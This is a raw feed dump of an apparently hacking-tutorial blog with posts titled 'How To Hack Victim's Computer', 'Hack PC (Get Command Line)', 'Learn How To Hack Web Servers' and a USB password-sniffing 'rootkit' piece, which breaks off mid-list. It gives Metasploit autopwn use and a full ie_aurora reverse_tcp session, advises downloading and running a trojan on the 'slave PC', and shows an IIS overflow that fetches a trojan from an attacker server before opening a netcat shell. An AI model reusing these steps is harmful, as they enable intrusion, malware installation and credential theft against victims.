&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;319&quot; src=&quot;http://i205.photobucket.com/albums/bb181/1-VIP-/12.gif&quot; style=&quot;border-bottom-color: rgb(212, 215, 222); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(212, 215, 222); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(212, 215, 222); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(212, 215, 222); border-top-style: solid; border-top-width: 1px; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 4px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;&quot; width=&quot;400&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
This is basically a list of the open ports and services running on the 
target machine, Now the handy feature of the metasploit 3.3 framework is
 the autopwn feature, this basically searches and runs all matching 
exploits in the Metasploit database against the target machine and if 
successful will create a shell or similar privilege for the attacker.&lt;br /&gt;
&lt;br /&gt;
Now once you have the nmap results delivered back to you showing the 
open ports and services type db_autopwn -p -t -e , From this point you 
will either have access to the victims computer through a successfully 
launched exploit or you will get a response saying the machine wasn&#39;t 
vulnerable to any of the exploits in the Metasploit database. 
Unfortunately on this particular machine I found it wasn&#39;t vulnerable as
 the image below proves.Good luck.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;318&quot; src=&quot;http://i205.photobucket.com/albums/bb181/1-VIP-/ff.gif&quot; style=&quot;border: 1px solid rgb(212, 215, 222); margin: 4px 0px 10px; padding: 5px;&quot; width=&quot;400&quot; /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/9080862637620393231/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/how-to-hack-victims-computer-with-nmap.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/9080862637620393231'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/9080862637620393231'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/how-to-hack-victims-computer-with-nmap.html' title='How To Hack Victim&#39;s Computer With Nmap And Metasploit'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-1617935866033537684</id><published>2013-01-05T05:56:00.003-08:00</published><updated>2013-01-11T02:34:44.758-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="desktop pc"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks How-To Guides"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="pc"/><category scheme="http://www.blogger.com/atom/ns#" term="pc computer"/><category scheme="http://www.blogger.com/atom/ns#" term="pc desktop"/><category scheme="http://www.blogger.com/atom/ns#" term="pc software"/><title type='text'>Hack PC (Get Command Line) without Sending Any File</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;b&gt;&lt;i&gt;(Windows OS)&lt;br /&gt;
After Download &amp;amp; Install&lt;br /&gt;
&lt;br /&gt;
Run Metasploit Update And Wait Until Update Complete!&lt;br /&gt;
Then Run Metasploit Console&lt;br /&gt;
&lt;br /&gt;
Then Do Like This(Bolds Texts is Which You must Write):&lt;br /&gt;
&lt;br /&gt;
msf &amp;gt; use exploit/windows/browser/ie_aurora&lt;br /&gt;
msf exploit(ie_aurora) &amp;gt; set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;
msf exploit(ie_aurora) &amp;gt; set LHOST (your IP)&lt;br /&gt;
msf exploit(ie_aurora) &amp;gt; set URIPATH /&lt;br /&gt;
msf exploit(ie_aurora) &amp;gt; exploit&lt;br /&gt;
[*] Exploit running as background job.[*] Started reverse handler on port 4444[*] Local IP:&lt;a href=&quot;http://192.168.0.151:8080/&quot; style=&quot;color: #1d81b6; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://192.168.0.151:8080/&lt;/a&gt;[*] Server started.&lt;br /&gt;
&lt;br /&gt;
msf exploit(ie_aurora) &amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3
 with IE 6) and enter the Local IP URL into the browser. If the exploit 
succeeds, you should see a new session in the Metasploit Console:&lt;br /&gt;
[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.0.151:4444 -&amp;gt; 192.168.0.166:1514)&lt;br /&gt;
&lt;br /&gt;
msf exploit(ie_aurora) &amp;gt; sessions -i 1[*] Starting interaction with 1...&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; getuid&lt;br /&gt;
Server username: WINXP\Developer&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; use espia&lt;br /&gt;
Loading extension espia...success.&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; shell&lt;br /&gt;
Process 892 created.&lt;br /&gt;
Channel 1 created.&lt;br /&gt;
Microsoft Windows XP [Version 5.1.2600]&lt;br /&gt;
© Copyright 1985-2001 Microsoft Corp.&lt;br /&gt;
&lt;br /&gt;
C:\Documents and Settings\Developer\Desktop&amp;gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;[ Remember CMD is Most Useful Control of WIN32 You Can Use FTP Command! To Download Trojan in slave PC! And Run it ]&lt;/b&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/1617935866033537684/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/hack-pc-get-command-line-without.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/1617935866033537684'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/1617935866033537684'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/hack-pc-get-command-line-without.html' title='Hack PC (Get Command Line) without Sending Any File'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-2884827038609933167</id><published>2013-01-05T05:56:00.000-08:00</published><updated>2013-01-11T02:23:59.136-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks How-To Guides"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacks"/><title type='text'>Learn How To Hack Web Servers</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;span class=&quot;sidebar-title&quot;&gt;&lt;b&gt;Hacking Tool: IISHack.exe&lt;/b&gt;&lt;/span&gt;&lt;/center&gt;
&lt;br /&gt;
&lt;div class=&quot;first-para&quot;&gt;
iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
c:\ iishack &lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.yourtarget.com/&quot; title=&quot;Linkification: http://www.yourtarget.com&quot;&gt;www.yourtarget.com&lt;/a&gt; 80 &lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.yourserver.com/thetrojan.exe&quot; title=&quot;Linkification: http://www.yourserver.com/thetrojan.exe&quot;&gt;www.yourserver.com/thetrojan.exe&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.yourtarget.com/&quot; title=&quot;Linkification: http://www.yourtarget.com&quot;&gt;www.yourtarget.com&lt;/a&gt; is the IIS server you&#39;re hacking, 80 is the port its listening on, &lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.yourserver.com/&quot; title=&quot;Linkification: http://www.yourserver.com&quot;&gt;www.yourserver.com&lt;/a&gt; is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
&quot;IIS
 Hack&quot; is a buffer overflow vulnerability exposed by the way IIS handles
 requests with .HTR extensions. A hacker sends a long URL that ends with
 &quot;.HTR&quot;. IIS interprets it as a file type of HTR and invokes the ISM.DLL
 to handle the request. Since ISM.DLL is vulnerable to a buffer 
overflow, a carefully crafted string can be executed in the security 
context of IIS, which is privileged. For example, it is relatively 
simple to include in the exploit code a sequence of commands that will 
open a TCP/IP connection, download an executable and then execute it. 
This way, any malicious code can be executed.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
A sample exploit can be constructed as shown below:&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
To hack the target site and attacker&#39;s system running a web server can use iishack.exe and ncx.exe.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
To begin with, the ncx.exe is configured to run from the root directory. IIShack.exe is then run against the victim site.&lt;/div&gt;
&lt;div class=&quot;informalexample&quot;&gt;
&lt;pre class=&quot;literallayout-normal&quot;&gt;c:\&amp;gt;iishack.exe  80 /ncx.exe &lt;/pre&gt;
&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
The attacker can then use netcat to evoke the command shell&lt;/div&gt;
&lt;div class=&quot;informalexample&quot;&gt;
&lt;pre class=&quot;literallayout-normal&quot;&gt;c:\&amp;gt;nc  80 &lt;/pre&gt;
&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.&lt;/div&gt;
&lt;div&gt;
&lt;span class=&quot;sidebar-title&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;span class=&quot;sidebar-title&quot;&gt;&lt;b&gt;IPP Buffer Overflow Countermeasures&lt;/b&gt;&lt;/span&gt;&lt;/center&gt;
&lt;br /&gt;
&lt;ul class=&quot;itemizedlist&quot; style=&quot;line-height: 19px; list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;&quot;&gt;
&lt;li class=&quot;first-listitem&quot; style=&quot;list-style-position: outside; margin-left: 1.6em;&quot;&gt;&lt;div class=&quot;first-para&quot;&gt;
Install latest service pack from Microsoft.&lt;/div&gt;
&lt;/li&gt;
&lt;li class=&quot;listitem&quot; style=&quot;list-style-position: outside; margin-left: 1.6em;&quot;&gt;&lt;div class=&quot;first-para&quot;&gt;
Remove IPP printing from IIS Server&lt;/div&gt;
&lt;/li&gt;
&lt;li class=&quot;listitem&quot; style=&quot;list-style-position: outside; margin-left: 1.6em;&quot;&gt;&lt;div class=&quot;first-para&quot;&gt;
Install firewall and remove unused extensions&lt;/div&gt;
&lt;/li&gt;
&lt;li class=&quot;listitem&quot; style=&quot;list-style-position: outside; margin-left: 1.6em;&quot;&gt;&lt;div class=&quot;first-para&quot;&gt;
Implement aggressive network egress filtering&lt;/div&gt;
&lt;/li&gt;
&lt;li class=&quot;listitem&quot; style=&quot;list-style-position: outside; margin-left: 1.6em;&quot;&gt;&lt;div class=&quot;first-para&quot;&gt;
Use IISLockdown and URLScan utilities&lt;/div&gt;
&lt;/li&gt;
&lt;li class=&quot;listitem&quot; style=&quot;list-style-position: outside; margin-left: 1.6em;&quot;&gt;&lt;div class=&quot;first-para&quot;&gt;
Regularly scan your network for vulnerable servers&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div class=&quot;para&quot;&gt;
Without any further explanation, the first countermeasure is obviously to install the latest service packs and hotfixes.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
As
 with many IIS vulnerabilities, the IPP exploit takes advantage of a bug
 in an ISAPI DLL that ships with IIS 5 and is configured by default to 
handle requests for certain file types. This particular ISAPI filter 
resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with
 support for the IPP. If this functionality is not required on the Web 
server, the application mapping for this DLL to .printer files can be 
removed (and optionally deleting the DLL itself) in order to prevent the
 buffer overflow from being exploited. This is possible because the DLL 
will not be loaded into the IIS process when it starts up. In fact, most
 security issues are centered on the ISAPI DLL mappings, making this one
 of the most important countermeasure to be adopted when securing IIS.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
Another
 standard countermeasure that can be adopted here is to use a firewall 
and remove any extensions that are not required. Implementing aggressive
 network egress can help to a certain degree.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
With
 IIS, using IISLockdown and URLScan - (free utilities from Microsoft) 
can ensure more protection and minimize damage in case the web server is
 affected.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
Microsoft has also released a patch 
for the buffer overflow, but removing the ISAPI DLL is a more proactive 
solution in case there are additional vulnerabilities that are yet to be
 found with the code.&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span class=&quot;sidebar-title&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;span class=&quot;sidebar-title&quot;&gt;&lt;b&gt;ISAPI DLL Source disclosures&lt;/b&gt;&lt;/span&gt;&lt;/center&gt;
&lt;br /&gt;
&lt;ul class=&quot;itemizedlist&quot; style=&quot;line-height: 19px; list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;&quot;&gt;
&lt;li class=&quot;first-listitem&quot; style=&quot;list-style-position: outside; margin-left: 1.6em;&quot;&gt;&lt;div class=&quot;first-para&quot;&gt;
Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.&lt;/div&gt;
&lt;/li&gt;
&lt;li class=&quot;listitem&quot; style=&quot;list-style-position: outside; margin-left: 1.6em;&quot;&gt;&lt;div class=&quot;first-para&quot;&gt;
This is done by appending &quot;+.htr&quot; to a request for a known .asp (or .asa, .ini, etc) file.&lt;/div&gt;
&lt;/li&gt;
&lt;li class=&quot;listitem&quot; style=&quot;list-style-position: outside; margin-left: 1.6em;&quot;&gt;&lt;div class=&quot;first-para&quot;&gt;
appending
 this string causes the request to be handled by ISM.DLL, which then 
strips the &#39;+.htr&#39; string and may disclose part or all of the source of 
the .asp file specified in the request.&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div class=&quot;para&quot;&gt;
IIS supports several file types that 
require server-side processing. When a web site visitor requests a file 
of one of these types, an appropriate filter DLL processes it. 
Vulnerability exists in ISM.DLL, the filter DLL that processes .HTR 
files. HTR files enable remote administration of user passwords.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
HTR
 files are scripts that allow Windows NT password services to be 
provided via IIS web servers. Windows NT users can use .HTR scripts to 
change their own passwords, and administrators can use them to perform a
 wide array of password administration functions. HTR is a 
first-generation advanced scripting technology that is included in IIS 
3.0, and still supported by later versions of IIS for backwards 
compatibility. However, HTR was never widely adopted, and was superceded
 by Active Server Pages (ASP) technology introduced in IIS 4.0.&lt;/div&gt;
&lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;note&quot; style=&quot;border-bottom-color: rgb(231, 231, 231); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(231, 231, 231); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(231, 231, 231); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(231, 231, 231); border-top-style: solid; border-top-width: 1px; margin-bottom: 24px; margin-left: 0px; margin-right: -1px; margin-top: 0px; text-align: left; width: 563px;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class=&quot;admon-check&quot; style=&quot;border-bottom-color: rgb(231, 231, 231); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(231, 231, 231); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(231, 231, 231); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(231, 231, 231); border-top-style: solid; border-top-width: 1px; padding-bottom: 6px; padding-left: 24px; padding-right: 24px; padding-top: 6px;&quot; valign=&quot;top&quot;&gt;&lt;br /&gt;
&lt;/td&gt;&lt;td class=&quot;admon-title&quot; style=&quot;border-bottom-color: rgb(231, 231, 231); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(231, 231, 231); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(231, 231, 231); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(231, 231, 231); border-top-style: solid; border-top-width: 1px; padding-bottom: 6px; padding-left: 24px; padding-right: 24px; padding-top: 6px;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;b&gt;Attack Methods&lt;/b&gt;&lt;/td&gt;&lt;td class=&quot;admon-body&quot; style=&quot;border-bottom-color: rgb(231, 231, 231); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(231, 231, 231); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(231, 231, 231); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(231, 231, 231); border-top-style: solid; border-top-width: 1px; padding-bottom: 6px; padding-left: 24px; padding-right: 24px; padding-top: 6px;&quot; valign=&quot;top&quot;&gt;&lt;div class=&quot;first-para&quot;&gt;
&lt;b class=&quot;bold&quot;&gt;Exploit / Attack Methodology&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;last-para&quot;&gt;
By
 making a specially formed request to IIS, with the name of the file and
 then appending around 230 + &quot; %20 &quot; (these represents spaces) and then 
appending &quot; .htr &quot; this tricks IIS into thinking that the client is 
requesting a &quot; .htr &quot; file . The .htr file extension is mapped to the 
ISM.DLL ISAPI Application and IIS redirects all requests for .htr 
resources to this DLL.&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;para&quot;&gt;
ISM.DLL is then passed the name of the
 file to open and execute but before doing this ISM.DLL truncates the 
buffer sent to it chopping off the .htr and a few spaces and ends up 
opening the file whose source is sought. The contents are then returned.
 This attack can only be launched once though, unless the web service 
started and stopped. It will only work when ISM.DLL first loaded into 
memory.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
&lt;i class=&quot;emphasis&quot;&gt;&lt;u class=&quot;underline&quot;&gt;&quot;Undelimited .HTR Request&quot; vulnerability:&lt;/u&gt;&lt;/i&gt;&amp;nbsp;The
 first vulnerability is a denial of service vulnerability. All .HTR 
files accept certain parameters that are expected to be delimited in a 
particular way. This vulnerability exists because the search routine for
 the delimiter isn&#39;t properly bounded. Thus, if a malicious user 
provided a request without the expected delimiter, the ISAPI filter that
 processes it would search forever for the delimiter and never find it.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
If
 a malicious user submitted a password change request that lacked an 
expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR 
files, would search endlessly for it. This would prevent the server from
 servicing any more password change requests. In addition, the search 
would consume CPU time, so the overall response of the server might be 
slowed.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
The second threat would be more difficult
 to exploit. A carefully-constructed file request could cause arbitrary 
code to execute on the server via a classic buffer overrun technique. 
Neither scenario could occur accidentally. This vulnerability does not 
involve the functionality of the password administration features of 
.HTR files.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
&lt;i class=&quot;emphasis&quot;&gt;&lt;u class=&quot;underline&quot;&gt;&quot;.HTR File Fragment Reading&quot; vulnerability:&lt;/u&gt;&lt;/i&gt;&amp;nbsp;The
 &quot;.HTR File Fragment Reading&quot; vulnerability could allow fragments of 
certain types of files to be read by providing a malformed request that 
would cause the. HTR processing to be applied to them. This 
vulnerability could allow a malicious user to read certain types of 
files under some very restrictive circumstances by levying a bogus .HTR 
request. The ISAPI filter will attempt to interpret the requested file 
as an .HTR file, and this would have the effect of removing virtually 
everything but text from a selected file. That is, it would have the 
effect of stripping out the very information that is most likely to 
contain sensitive information in .asp and other server-side files.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
The
 .htr vulnerability will allow data to be added, deleted or changed on 
the server, or allow any administrative control on the server to be 
usurped. Although .HTR files are used to allow web-based password 
administration, this vulnerability does not involve any weakness in 
password handling.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
&lt;i class=&quot;emphasis&quot;&gt;&lt;u class=&quot;underline&quot;&gt;&quot;Absent Directory Browser Argument&quot; vulnerability:&lt;/u&gt;&lt;/i&gt;&amp;nbsp;Among
 the default HTR scripts provided in IIS 3.0 (and preserved on upgrade 
to IIS 4.0 and IIS 5.0) were several that allowed web site 
administrators to view directories on the server. One of these scripts, 
if called without an expected argument, will enter an infinite loop that
 can consume all of the system&#39;s CPU availability, thereby preventing 
the server from responding to requests for service.&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/2884827038609933167/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/learn-how-to-hack-web-servers.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/2884827038609933167'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/2884827038609933167'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/learn-how-to-hack-web-servers.html' title='Learn How To Hack Web Servers'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-2585190250570812062</id><published>2013-01-05T05:54:00.002-08:00</published><updated>2013-07-28T00:48:30.938-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks How-To Guides"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacks"/><title type='text'>How to Sniff/Hack Passwords Using USB Drive?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div dir=&quot;ltr&quot; trbidi=&quot;on&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #595543; font-family: Arial, verdana, Tahoma, &#39;Century gothic&#39;, sans-serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;In My&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: xx-small; line-height: 18.999988555908203px;&quot;&gt;Previous&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp;posts i have write about Hacking email passwords using &lt;a href=&quot;http://hackerx-malik.blogspot.com/search/label/Keylogging&quot;&gt;keyloggers&lt;/a&gt; and&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;line-height: 18.999988555908203px;&quot;&gt;&lt;a href=&quot;http://hackerx-malik.blogspot.com/search/label/Phishing&quot;&gt;phishers&lt;/a&gt;.&lt;/span&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp;we all know, Windows&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD8&quot; style=&quot;font-size: 13px; line-height: 19px;&quot;&gt;stores&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp;most of the passwords which are used on a daily basis, including&amp;nbsp;instant messenger passwords such as MSN, Yahoo, AOL,&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot; style=&quot;font-size: 13px; line-height: 19px;&quot;&gt;Windows messenger&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;etc. Along with these, Windows also stores passwords of&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot; style=&quot;font-size: 13px; line-height: 19px;&quot;&gt;Outlook&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp;Express,
 SMTP, POP, FTP accounts and auto-complete passwords of many 
browsers&amp;nbsp;like IE and Firefox. There exists many tools for recovering 
these passswords from their stored places.&amp;nbsp;Using these tools and an USB&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot; style=&quot;font-size: 13px; line-height: 19px;&quot;&gt;pendrive&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp;you can create your own rootkit to&amp;nbsp;sniff passwords from any computer. We need the following tools to create our rootkit.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;post-body entry-content&quot; style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 5px;&quot;&gt;
&lt;div id=&quot;TixyyLink&quot; style=&quot;border-style: none; border-width: medium; overflow: hidden;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1oTW2HVadY-aSglB90TS8wKHYvbzu9IBe2YM-oy8uPt-Nn9L0LtUaThRJSjjvyaB58-OgZ655-LqwD8gA5s-O6MgSXr4Eiw63HnLbaaqfKJ_9W5aiYa-lRcxLG-1bVjNEF9GBjued54_7/s1600-h/sandisk-cruzer-contour-16gb-usb-pen-drive.gif&quot; style=&quot;color: #1d81b6; margin-left: 1em; margin-right: 1em; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1oTW2HVadY-aSglB90TS8wKHYvbzu9IBe2YM-oy8uPt-Nn9L0LtUaThRJSjjvyaB58-OgZ655-LqwD8gA5s-O6MgSXr4Eiw63HnLbaaqfKJ_9W5aiYa-lRcxLG-1bVjNEF9GBjued54_7/s320/sandisk-cruzer-contour-16gb-usb-pen-drive.gif&quot; style=&quot;border: 1px solid rgb(212, 215, 222); margin: 4px 0px 10px; padding: 5px;&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&amp;nbsp;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;a href=&quot;http://www.nirsoft.net/utils/mspass.html&quot; rel=&quot;nofollow&quot; style=&quot;color: #b50000; margin: 0px; outline: none; padding: 0px;&quot; target=&quot;_blank&quot;&gt;MessenPass&lt;/a&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;Recovers
 the passwords of most popular Instant Messenger programs: MSN 
